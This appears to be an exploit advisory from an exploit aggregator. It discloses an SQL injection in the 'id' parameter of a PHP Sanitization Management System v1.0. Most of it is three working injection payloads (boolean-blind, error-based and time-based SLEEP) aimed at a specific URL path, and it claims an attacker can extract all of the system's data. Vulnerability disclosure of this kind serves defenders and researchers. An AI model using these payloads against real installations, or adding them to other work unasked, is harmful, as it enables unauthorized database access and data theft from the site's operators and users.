Share
## https://sploitus.com/exploit?id=PACKETSTORM:170013
## Title: SMS - PHP (by: oretnom23 ) v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 11.25.2022  
## Vendor: https://github.com/oretnom23,  
https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/download-code?nid=15770&title=Sanitization+Management+System+Project+in+PHP+and+MySQL+Free+Source+Code  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0  
  
## Description:  
The `id` parameter appears to be vulnerable to SQL injection attacks.  
The attacker can get all information from this system by using this  
vulnerability.  
  
## STATUS: HIGH Vulnerability - CRITICAL  
  
[+] Payload:  
  
```MySQL  
Parameter: id (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: p=services/view_service&id=126664801' or '5968'='5975' OR  
NOT 5461=5461 AND 'gEud'='gEud  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: p=services/view_service&id=126664801' or '5968'='5975' OR  
(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT  
(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: p=services/view_service&id=126664801' or '5968'='5975'  
AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Sanitization-Management-System-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/rnfvjf)  
  
## Time spent  
`00:30:00`